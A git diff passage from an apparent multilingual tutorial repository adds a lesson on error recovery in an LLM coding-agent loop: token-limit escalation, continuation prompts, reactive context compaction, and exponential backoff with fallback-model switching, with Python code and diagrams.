Pick up mid-thought."}) + state.recovery_count += 1 + continue +``` + +拡張は 1 回だけ、続きの出力は最大 3 回。超過したら終了——これ以上続けても実質的な出力は得られない。 + +### パス 2: コンテキスト超過 + +LLM が「コンテキストが長すぎる」と返す(`prompt_too_long`)。s08 の 4 層圧縮をすべて実行したのに、まだ超えている。 + +reactive compact をトリガー——auto compact よりも積極的で、最後の 5 メッセージ + 要約だけを残す。圧縮後にリトライ。ただし、一度圧縮してもまだ超過している場合は終了するしかない——再度圧縮しても小さくはならない: + +```python +except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return # 圧縮済みでも超過、終了するしかない +``` + +### パス 3: 一時的障害 + +ネットワークの揺らぎ、429 レート制限、529 過負荷——これらはバグではなく、分散システムの日常だ。 + +指数バックオフ + ジッター:1 回目は 0.5 秒待機、2 回目は 1 秒、3 回目は 2 秒、最大 10 回。ランダムジッターを加えることで、並行リクエストが同時にリトライするのを防ぐ。3 回連続で 529 過負荷 → フォールバックモデルに切り替え: + +```python +def with_retry(fn, state, max_retries=10): + for attempt in range(max_retries): + try: + return fn() + except RateLimitError: + delay = min(500 * (2 ** attempt), 32000) + random_jitter() + time.sleep(delay / 1000) + except OverloadedError: + state.consecutive_529 += 1 + if state.consecutive_529 >= 3: + switch_to_fallback_model() + time.sleep(500 / 1000) + raise MaxRetriesExceeded() +``` + +バックオフの公式:`min(500 × 2^attempt, 32000) + random(0~25%)`。サーバーが `Retry-After` ヘッダーを返した場合、その値を優先して使用する。 + +### 統合して実行 + +```python +def agent_loop(messages, context): + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = 8000 + + while True: + try: + response = with_retry( + lambda: client.messages.create( + model=MODEL, system=system, + messages=messages, tools=TOOLS, + max_tokens=max_tokens), + state) + except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return + except Exception as e: + log_error(e) + return + + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason == "max_tokens": + # Path 1: escalate or continue + 
... + continue + if response.stop_reason != "tool_use": + return + # ... tool execution ... +``` + +外側の try/except が API 例外(prompt_too_long、ネットワークエラー)を捕捉し、`with_retry` が一時的エラー(429/529)を処理し、`stop_reason` のチェックが切り詰めを処理する。3 つの復旧メカニズムがそれぞれ異なるエラータイプを担当する。 + +--- + +## s10 からの変更点 + +| コンポーネント | 変更前 (s10) | 変更後 (s11) | +|---------------|-------------|-------------| +| エラー処理 | なし(エラーで即クラッシュ) | 3 つの復旧パターン + 指数バックオフ | +| 新規定数 | — | ESCALATED_MAX_TOKENS=64000, MAX_RETRIES=10, BASE_DELAY_MS=500 | +| 新規関数 | — | with_retry, reactive_compact, RecoveryState | +| ツール | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 変更なし | +| ループ | LLM を直接呼び出し | try/except で包み + continue でリトライ | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s11_error_recovery/code.py +``` + +以下の prompt を試してみよう: + +1. Agent に長いコードを生成させ、切り詰め後に自動で続きが出力されるか観察する(`[max_tokens] escalating` ログを確認) +2. 連続して大量のファイルを読み込みコンテキストを肥大化させ、reactive compact の動作を観察する +3. 429/529 が発生した場合、指数バックオフのログ出力を観察する + +--- + +## 次のステップ + +Agent はエラーから自動的に復旧できるようになった。しかし、まだ処理するタスクは「使い捨て」だ——タスクを与えると実行し、終わる。 + +Agent に**タスクリスト**を管理させられないだろうか——依存関係があり、ディスクに永続化され、セッションをまたいで復旧できる?TODO リストはタスクシステムではない。 + +s12 Task System → タスクとは依存関係があり、状態があり、永続化されたグラフだ。これはマルチ Agent 協調の基盤となる。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `query.ts`(1729 行)、`withRetry.ts`、`tokenBudget.ts` の完全分析に基づく。 + +### 一、13 以上の reason code(3 つだけではない) + +教学版では最も一般的な 3 つの復旧パターンを解説した。CC には実際 13 以上の reason code があり、毎回の LLM 呼び出し後に判定される: + +| reason code | 教学版の対応 | CC の動作 | +|---|---|---| +| `completed` | 正常終了 | 結果を返す | +| `max_output_tokens_escalate` | パス 1 | 8K→64K に拡張 | +| `max_output_tokens_recovery` | パス 1 続き出力 | 続きのプロンプト注入(最大 3 回) | +| `reactive_compact_retry` | パス 2 | reactive compact → リトライ | +| `prompt_too_long` | パス 2 | 同上 | +| `model_error` | 未展開 | リトライ | +| `image_error` | 未展開 | `ImageSizeError` / `ImageResizeError` の専用処理 | +| `aborted_streaming` | 未展開 | ストリーミング中断の復旧 | +| `stop_hook_blocking` | 未展開 | blocking error を注入 → モデルが自己修正 | +| `stop_hook_prevented` | 未展開 | hooks によるブロック | +| `token_budget_continuation` | 未展開 | token 使用量 < 90% の時に継続 | +| `blocking_limit` | 未展開 | ブロック制限 | +| `collapse_drain_retry` | 未展開 | context collapse 時にまず保留中の内容をコミット | + +教学版では最初の 5 つ(最も一般的なもの)だけを展開した。残りはそれぞれ専用の処理ロジックを持つ。 + +### 二、指数バックオフの正確な公式 + +CC のバックオフ遅延(`withRetry.ts:530-548`): + +``` +delay = min(500 × 2^(attempt-1), 32000) + random(0~25%) +``` + +| 試行 | 基本遅延 | + ジッター | +|------|---------|-----------| +| 1 | 500ms | 0-125ms | +| 2 | 1000ms | 0-250ms | +| 4 | 4000ms | 0-1000ms | +| 7+ | 32000ms(上限) | 0-8000ms | + +サーバーが `Retry-After` ヘッダーを返した場合、その値を優先して使用する。 + +### 三、CONTINUATION プロンプト原文 + +CC の続き出力プロンプト(`query.ts:1225-1227`): + +``` +Output token limit hit. Resume directly — no apology, no recap of what +you were doing. Pick up mid-thought if that is where the cut happened. +Break remaining work into smaller pieces. +``` + +Token budget のナッジプロンプト(`tokenBudget.ts:72`): + +``` +Stopped at {pct}% of token target. Keep working — do not summarize. 
+``` + +### 四、ストリーミングエラー処理 + +CC のストリーミングパスでは、復旧可能なエラー(413、max_tokens、media error)はストリーミング中**表示を保留される**(`query.ts:799-822`)——SDK コンシューマーには見えず、復旧ロジックだけが認識できる。ストリーミング終了後に復旧が必要かどうかを判断する。 + +### 五、529 → フォールバックモデル切り替え + +3 回連続で 529 過負荷エラーが発生した後(`MAX_529_RETRIES = 3`)、CC は自動的にフォールバックモデルに切り替える(例:Opus → Sonnet)。切り替え時にすべての保留中のメッセージと tool 結果をクリアし、ユーザーに "Switched to {model} due to high demand" と表示する。 + +### 六、収穫逓減の検出 + +Token budget の「継続」は無限ではない。連続 3 回の continuation で token 増分が 500 未満の場合、システムは「続けても実質的な出力は得られない」と判断し、continuation を停止する(`tokenBudget.ts:60-62`)。 + +
+ + diff --git a/s11_error_recovery/README.md b/s11_error_recovery/README.md new file mode 100644 index 000000000..75478e926 --- /dev/null +++ b/s11_error_recovery/README.md @@ -0,0 +1,257 @@ +# s11: Error Recovery — 错误不是结束,是重试的开始 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s09 → s10 → `s11` → [s12](../s12_task_system/) → s13 → ... → s19 +> *"错误不是终点, 是重试的起点"* — 升级 token、压缩上下文、切换模型。 +> +> **Harness 层**: 韧性 — 主循环遇到错误时分类并恢复。 + +--- + +## 问题 + +Agent 跑着跑着报错了: + +``` +Error: 529 overloaded +``` + +Agent 崩溃了。它没有重试,没有换模型,没有减少上下文——直接崩溃。 + +生产环境中 API 错误是常态。三种最常见的故障模式:**输出被截断**(模型话说一半 token 用完了)、**上下文超限**(压缩后还是太长)、**临时故障**(429 限流 / 529 过载 / 网络断了)。一个不处理错误的 Agent 就像一个一碰就熄火的车。 + +--- + +## 解决方案 + +![Error Recovery Overview](images/error-recovery-overview.svg) + +s10 的循环、prompt 组装全部保留。唯一的变动:LLM 调用包裹在 try/except 里,根据错误类型走不同的恢复路径。恢复后 `continue` 回到循环开头重新调用 LLM。 + +三种最常见的恢复模式(CC 实际有 13+ reason code,其余见 Deep dive): + +| 模式 | 触发 | 恢复动作 | +|------|------|---------| +| 输出截断 | `max_tokens` | 升级 8K→64K / 续写提示 | +| 上下文超限 | `prompt_too_long` | reactive compact → 重试 | +| 临时故障 | 429 / 529 | 指数退避 + 抖动 | + +--- + +## 工作原理 + +### 路径 1: 输出被截断 + +模型话说一半,`max_tokens` 用完了。默认 8000 token 不够它输出完整回答。 + +第一次发生时,直接把 `max_tokens` 从 8K 升级到 64K(8 倍空间),重试同一请求。如果 64K 还是不够,注入续写提示让模型接着刚才的话继续说,最多 3 次: + +```python +ESCALATED_MAX_TOKENS = 64000 + +if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. 
Pick up mid-thought."}) + state.recovery_count += 1 + continue +``` + +升级只有一次机会,续写最多 3 次。超过就退出——继续续写也不会有实质产出。 + +### 路径 2: 上下文超限 + +LLM 说"你的上下文太长了"(`prompt_too_long`)。s08 的四层压缩全跑过了,还是超。 + +触发 reactive compact——比 auto compact 更激进,只保留最后 5 条消息 + 摘要。压缩后重试。但如果压缩过一次还是超限,只能退出——再压缩也不会变小: + +```python +except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return # 压缩过了还是超限,只能退出 +``` + +### 路径 3: 临时故障 + +网络抖动、429 限流、529 过载——这些不是 bug,是分布式系统的常态。 + +指数退避 + 抖动:第一次等 0.5 秒,第二次等 1 秒,第三次等 2 秒,最多 10 次。加随机抖动让并发请求不在同一时刻重试。连续 3 次 529 过载 → 切换到备用模型: + +```python +def with_retry(fn, state, max_retries=10): + for attempt in range(max_retries): + try: + return fn() + except RateLimitError: + delay = min(500 * (2 ** attempt), 32000) + random_jitter() + time.sleep(delay / 1000) + except OverloadedError: + state.consecutive_529 += 1 + if state.consecutive_529 >= 3: + switch_to_fallback_model() + time.sleep(500 / 1000) + raise MaxRetriesExceeded() +``` + +退避公式:`min(500 × 2^attempt, 32000) + random(0~25%)`。如果服务器返回 `Retry-After` header,优先用那个值。 + +### 合起来跑 + +```python +def agent_loop(messages, context): + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = 8000 + + while True: + try: + response = with_retry( + lambda: client.messages.create( + model=MODEL, system=system, + messages=messages, tools=TOOLS, + max_tokens=max_tokens), + state) + except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return + except Exception as e: + log_error(e) + return + + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason == "max_tokens": + # Path 1: escalate or continue + ... + continue + if response.stop_reason != "tool_use": + return + # ... tool execution ... 
+``` + +外层 try/except 捕获 API 异常(prompt_too_long、网络错误),`with_retry` 处理瞬态错误(429/529),`stop_reason` 检查处理截断。三种恢复机制各管各的错误类型。 + +--- + +## 相对 s10 的变更 + +| 组件 | 之前 (s10) | 之后 (s11) | +|------|-----------|-----------| +| 错误处理 | 无(一碰就崩溃) | 三种恢复模式 + 指数退避 | +| 新常量 | — | ESCALATED_MAX_TOKENS=64000, MAX_RETRIES=10, BASE_DELAY_MS=500 | +| 新函数 | — | with_retry, reactive_compact, RecoveryState | +| 工具 | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 不变 | +| 循环 | 裸调用 LLM | try/except 包裹 + continue 重试 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s11_error_recovery/code.py +``` + +试试这些 prompt: + +1. 让 Agent 生成一段很长的代码,观察截断后是否自动续写(看 `[max_tokens] escalating` 日志) +2. 连续读取大量文件撑大上下文,观察 reactive compact +3. 如果遇到 429/529,观察指数退避的日志输出 + +--- + +## 接下来 + +Agent 现在能在错误中自动恢复了。但它处理的任务仍然是"一次性"的——你给它一个任务,它做完,结束。 + +能不能让 Agent 管理一个**任务列表**——有依赖关系、持久化到磁盘、跨会话能恢复?TODO 列表不是任务系统。 + +s12 Task System → 任务是有依赖、有状态、持久化的图。这是多 Agent 协作的基础。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `query.ts`(1729 行)、`withRetry.ts`、`tokenBudget.ts` 的完整分析。 + +### 一、13+ reason code(不只是 3 条) + +教学版讲了 3 种最常见的恢复模式。CC 实际有 13+ reason code,每轮 LLM 调用后都会判断: + +| reason code | 教学版对应 | CC 行为 | +|---|---|---| +| `completed` | 正常完成 | 返回结果 | +| `max_output_tokens_escalate` | 路径 1 | 8K→64K 升级 | +| `max_output_tokens_recovery` | 路径 1 续写 | 续写提示(最多 3 次) | +| `reactive_compact_retry` | 路径 2 | reactive compact → 重试 | +| `prompt_too_long` | 路径 2 | 同上 | +| `model_error` | 未展开 | 重试 | +| `image_error` | 未展开 | `ImageSizeError` / `ImageResizeError` 专门处理 | +| `aborted_streaming` | 未展开 | 流式中止恢复 | +| `stop_hook_blocking` | 未展开 | 注入 blocking error → 模型自纠 | +| `stop_hook_prevented` | 未展开 | hooks 阻止 | +| `token_budget_continuation` | 未展开 | token 用量 < 90% 时继续 | +| `blocking_limit` | 未展开 | 阻塞限制 | +| `collapse_drain_retry` | 未展开 | context collapse 先提交暂存 | + +教学版只展开了前 5 种(最常见的),其余各有专门处理逻辑。 + +### 二、指数退避的精确公式 + +CC 的退避延迟(`withRetry.ts:530-548`): + +``` +delay = min(500 × 2^(attempt-1), 32000) + random(0~25%) +``` + +| 尝试 | 基础延迟 | + 抖动 | +|------|---------|--------| +| 1 | 500ms | 0-125ms | +| 2 | 1000ms | 0-250ms | +| 4 | 4000ms | 0-1000ms | +| 7+ | 32000ms(上限) | 0-8000ms | + +如果服务器返回 `Retry-After` header,优先用那个值。 + +### 三、CONTINUATION 提示原文 + +CC 的续写提示(`query.ts:1225-1227`): + +``` +Output token limit hit. Resume directly — no apology, no recap of what +you were doing. Pick up mid-thought if that is where the cut happened. +Break remaining work into smaller pieces. +``` + +Token budget 的 nudge 提示(`tokenBudget.ts:72`): + +``` +Stopped at {pct}% of token target. Keep working — do not summarize. 
+``` + +### 四、流式错误处理 + +CC 的流式路径中,可恢复的错误(413、max_tokens、media error)在 streaming 期间**被暂扣不展示**(`query.ts:799-822`)——SDK 消费者看不到,只有恢复逻辑能看到。等 streaming 结束后才判断是否需要恢复。 + +### 五、529 → Fallback Model 切换 + +连续 3 次 529 过载错误后(`MAX_529_RETRIES = 3`),CC 自动切换到 fallback model(如 Opus → Sonnet)。切换时清除所有 pending 消息和 tool 结果,给用户展示 "Switched to {model} due to high demand"。 + +### 六、Diminishing Returns 检测 + +Token budget 的"继续"不是无限的。当连续 3 次 continuation 且 token 增量 < 500 时,系统判断"继续也没有实质性产出",停止 continuation(`tokenBudget.ts:60-62`)。 + +
+ + diff --git a/s11_error_recovery/code.py b/s11_error_recovery/code.py new file mode 100644 index 000000000..7e1c7a0cf --- /dev/null +++ b/s11_error_recovery/code.py @@ -0,0 +1,313 @@ +#!/usr/bin/env python3 +""" +s11: Error Recovery — try/except with three recovery paths + exponential backoff. + +Run: python s11_error_recovery/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s10: + - LLM call wrapped in try/except with three recovery paths + - Path 1: max_tokens -> escalate 8K->64K or continue prompt (max 3) + - Path 2: prompt_too_long -> reactive compact -> retry (once) + - Path 3: 429/529 -> exponential backoff with jitter (max 10) + - with_retry wrapper for transient errors + - RecoveryState tracks escalation / compact / 529 counters + +ASCII flow: + messages -> prompt assembly -> compress+load -> [try] LLM [except] -> tools -> loop + | | + stop_reason error type + max_tokens? prompt_too_long? -> compact + escalate / 429/529? -> backoff + continue other? -> log + exit +""" + +import os, subprocess, time, random +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Constants ── + +ESCALATED_MAX_TOKENS = 64000 +DEFAULT_MAX_TOKENS = 8000 +MAX_RECOVERY_RETRIES = 3 +MAX_RETRIES = 10 +BASE_DELAY_MS = 500 +MAX_CONSECUTIVE_529 = 3 + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (unchanged) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... 
({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, +] + +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write} + + +# ── Error Recovery (s11 new) ── + +class RecoveryState: + """Track recovery attempts across the loop.""" + def __init__(self): + self.has_escalated = False + self.recovery_count = 0 + self.consecutive_529 = 0 + self.has_attempted_reactive_compact = False + + +def with_retry(fn, state: RecoveryState): + """Exponential backoff for transient errors (429/529). 
+ Non-transient errors are re-raised for the outer handler.""" + for attempt in range(MAX_RETRIES): + try: + result = fn() + state.consecutive_529 = 0 + return result + except Exception as e: + name = type(e).__name__ + msg = str(e).lower() + + # Path 3a: 429 rate limit -> exponential backoff + if "ratelimit" in name.lower() or "429" in msg: + delay_s = min(BASE_DELAY_MS * (2 ** attempt), 32000) / 1000 + jitter = random.uniform(0, delay_s * 0.25) + print(f" \033[33m[429 rate limit] retry {attempt+1}/{MAX_RETRIES}," + f" wait {delay_s:.1f}s\033[0m") + time.sleep(delay_s + jitter) + continue + + # Path 3b: 529 overloaded -> fixed delay + model switch + if "overloaded" in name.lower() or "529" in msg or "overloaded" in msg: + state.consecutive_529 += 1 + if state.consecutive_529 >= MAX_CONSECUTIVE_529: + print(f" \033[31m[529 x{state.consecutive_529}]" + f" would switch model (CC behavior)\033[0m") + state.consecutive_529 = 0 + time.sleep(BASE_DELAY_MS / 1000) + continue + + # Not transient -> re-raise for outer try/except + raise + raise RuntimeError(f"Max retries ({MAX_RETRIES}) exceeded") + + +def reactive_compact(messages: list) -> list: + """Emergency compact — keep only last 5 messages + summary.""" + print(" \033[31m[reactive compact] trimming to last 5 messages\033[0m") + tail = messages[-5:] + return [{"role": "user", + "content": "[Reactive compact] Earlier conversation trimmed. 
" + "Continue from where you left off."}, *tail] + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + """Main loop with error recovery wrapping LLM calls.""" + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = DEFAULT_MAX_TOKENS + + while True: + # ── LLM call: with_retry handles 429/529, outer handles rest ── + try: + response = with_retry( + lambda mt=max_tokens: client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=mt), + state) + except Exception as e: + name = type(e).__name__ + msg = str(e).lower() + + # Path 2: prompt_too_long -> reactive compact (once) + if "prompt" in msg and "long" in msg: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + print(" \033[31m[unrecoverable] still too long after compact\033[0m") + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": "[Error] Context too large, cannot continue."}]}) + return + + # Unrecoverable + print(f" \033[31m[unrecoverable] {name}: {str(e)[:100]}\033[0m") + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {name}: {str(e)[:200]}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + + # ── Path 1: max_tokens -> escalate or continue ── + if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + print(f" \033[33m[max_tokens] escalating" + f" {DEFAULT_MAX_TOKENS} -> {ESCALATED_MAX_TOKENS}\033[0m") + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + 
messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. Pick up mid-thought."}) + state.recovery_count += 1 + print(f" \033[33m[max_tokens] continuation" + f" {state.recovery_count}/{MAX_RECOVERY_RETRIES}\033[0m") + continue + print(" \033[31m[max_tokens] recovery limit reached\033[0m") + return + + if response.stop_reason != "tool_use": + return + + # ── Tool execution ── + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s11: error recovery") + print("Enter a question, press Enter to send. 
Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms11 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s11_error_recovery/images/error-recovery-overview.en.svg b/s11_error_recovery/images/error-recovery-overview.en.svg new file mode 100644 index 000000000..22790a3c5 --- /dev/null +++ b/s11_error_recovery/images/error-recovery-overview.en.svg @@ -0,0 +1,98 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Error Recovery — try/except wrapping LLM calls, three recovery modes + + + + s10 retained + + s11 new + + + + messages + + + + + prompt assembly + (s10) + + + + + compress + load + (s08-s09) + + + + + + LLM + try/except + + + + + TOOL_HANDLERS + bash · read · write + + + + error + + + + Error Recovery (classify, recover, retry LLM) + + + + Path 1 + max_tokens + Output truncated → escalate 8K→64K (once) / continuation prompt (max 3) + Trigger: stop_reason == "max_tokens" · Cost: 0-1 API · Recover then continue + + + + Path 2 + prompt_too_long + Context overflow → reactive compact → retry (one chance) + Trigger: API returns 413 · Cost: 1 API · Still over after compact → exit + + + + Path 3 + 429/529 + Transient failure → exponential backoff + jitter (max 10) / 3×529 → switch model + Trigger: RateLimitError / OverloadedError · Formula: min(500×2^n, 32s) + jitter + + + + Three most common recovery modes. CC has 13+ reason codes (image_error, aborted_streaming, etc.), each with dedicated handling. 
+ All paths after recovery → continue back to LLM · Normal flow: tool results → messages → loop + diff --git a/s11_error_recovery/images/error-recovery-overview.ja.svg b/s11_error_recovery/images/error-recovery-overview.ja.svg new file mode 100644 index 000000000..36c4fd606 --- /dev/null +++ b/s11_error_recovery/images/error-recovery-overview.ja.svg @@ -0,0 +1,98 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Error Recovery — try/except で LLM 呼び出しをラップ、3 つの復旧モード + + + + s10 維持 + + s11 新規 + + + + messages + + + + + prompt assembly + (s10) + + + + + compress + load + (s08-s09) + + + + + + LLM + try/except + + + + + TOOL_HANDLERS + bash · read · write + + + + エラー + + + + エラー復旧(分類処理、復旧後 LLM に戻りリトライ) + + + + パス 1 + max_tokens + 出力が途切れた → 8K→64K に拡張(1 回)/ 続行プロンプト(最大 3 回) + トリガー: stop_reason == "max_tokens" · コスト: 0-1 API · 復旧後 continue + + + + パス 2 + prompt_too_long + コンテキスト超過 → reactive compact → リトライ(1 回のみ) + トリガー: API が 413 返却 · コスト: 1 API · 圧縮後も超過 → 終了 + + + + パス 3 + 429/529 + 一時障害 → 指数バックオフ + ジッター(最大 10 回)/ 3 回 529 → モデル切替 + トリガー: RateLimitError / OverloadedError · 式: min(500×2^n, 32s) + jitter + + + + 最も一般的な 3 つの復旧モード。CC は実際に 13+ の reason code を持ち(image_error, aborted_streaming 等)、それぞれ専用の処理がある。 + 全パス復旧後 → continue で LLM に戻る · 正常フロー: ツール結果 → messages → ループ + \ No newline at end of file diff --git a/s11_error_recovery/images/error-recovery-overview.svg b/s11_error_recovery/images/error-recovery-overview.svg new file mode 100644 index 000000000..63f4b2fe1 --- /dev/null +++ b/s11_error_recovery/images/error-recovery-overview.svg @@ -0,0 +1,98 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Error Recovery — try/except 包裹 LLM 调用,三种恢复模式 + + + + s10 保留 + + s11 新增 + + + + messages + + + + + prompt assembly + (s10) + + + + + compress + load + (s08-s09) + + + + + + LLM + try/except + + + + + TOOL_HANDLERS + bash · read · write + + + + 报错 + + + + 错误恢复(分类处理,恢复后回到 LLM 重试) + + + + 路径 1 + max_tokens + 输出被截断 → 升级 8K→64K(一次)/ 续写提示(最多 3 次) + 触发: stop_reason == 
"max_tokens" · 代价: 0-1 API · 恢复后 continue + + + + 路径 2 + prompt_too_long + 上下文超限 → reactive compact → 重试(一次机会) + 触发: API 返回 413 · 代价: 1 API · 压缩过还是超 → 退出 + + + + 路径 3 + 429/529 + 临时故障 → 指数退避 + 抖动(最多 10 次)/ 3 次 529 → 切换模型 + 触发: RateLimitError / OverloadedError · 公式: min(500×2^n, 32s) + jitter + + + + 三种最常见的恢复模式。CC 实际有 13+ reason code(image_error、aborted_streaming 等),各有专门处理。 + 所有路径恢复后 → continue 回到 LLM · 正常流程: 工具结果 → messages → 循环 + diff --git a/s12_task_system/README.en.md b/s12_task_system/README.en.md new file mode 100644 index 000000000..b4cee602a --- /dev/null +++ b/s12_task_system/README.en.md @@ -0,0 +1,262 @@ +# s12: Task System — Break Big Goals into Small Tasks + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s10 → s11 → `s12` → [s13](../s13_background_tasks/) → s14 → ... → s19 + +> *"Break big goals into small tasks, order them, persist"* — File-persisted task graph, the foundation for multi-agent collaboration. +> +> **Harness Layer**: Tasks — Persisted goals, recoverable progress. + +--- + +## The Problem + +The agent receives a project: set up a database, write APIs, add tests. It uses s05's TodoWrite to create a checklist, then starts working — writes the API first, gets halfway through and realizes there are no database tables, goes back to fix them; when adding tests, discovers the API interface signatures have changed again... + +You can't build the roof before laying the foundation. Tasks have ordering — this "who goes first" relationship has a name: **Directed Acyclic Graph (DAG)**. + +s05's TodoWrite is a list. No dependencies, no persistence — when the conversation ends, the list is gone. What you need is a **task system**: each task is a JSON file, tasks have `blockedBy` dependencies, and they persist across sessions on disk. + +--- + +## The Solution + +![Task System Overview](images/task-system-overview.en.svg) + +s11's loop and prompt assembly are fully preserved. 
The only change: 4 new task tools + `.tasks/` directory for persistence + `blockedBy` dependency checking. The task system and error recovery are independent layers — in CC source, `utils/tasks.ts` only handles CRUD, while `query.ts`'s with_retry/RecoveryState handles error recovery, with no coupling between them. + +TodoWrite vs Task System: + +| | TodoWrite (s05) | Task System (s12) | +|---|---|---| +| Storage | In-memory list | `.tasks/` JSON files | +| Dependencies | None | `blockedBy` directed acyclic graph | +| Persistence | Lost when conversation ends | Cross-session | +| Multi-agent | None | `owner` field | +| Status | checked / unchecked | pending → in_progress → completed | + +--- + +## How It Works + +![Task DAG](images/task-dag.en.svg) + +### Task: Data Structure + +Each task is a JSON file, stored in the `.tasks/` directory: + +```python +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent name (multi-agent scenarios) + blockedBy: list[str] # List of dependency task IDs +``` + +IDs are generated with `timestamp + random hex` — simple but sufficient. CC uses sequential IDs + a highwatermark file to prevent ID reuse, which is a more rigorous design. + +### create_task: Create Tasks + +```python +def 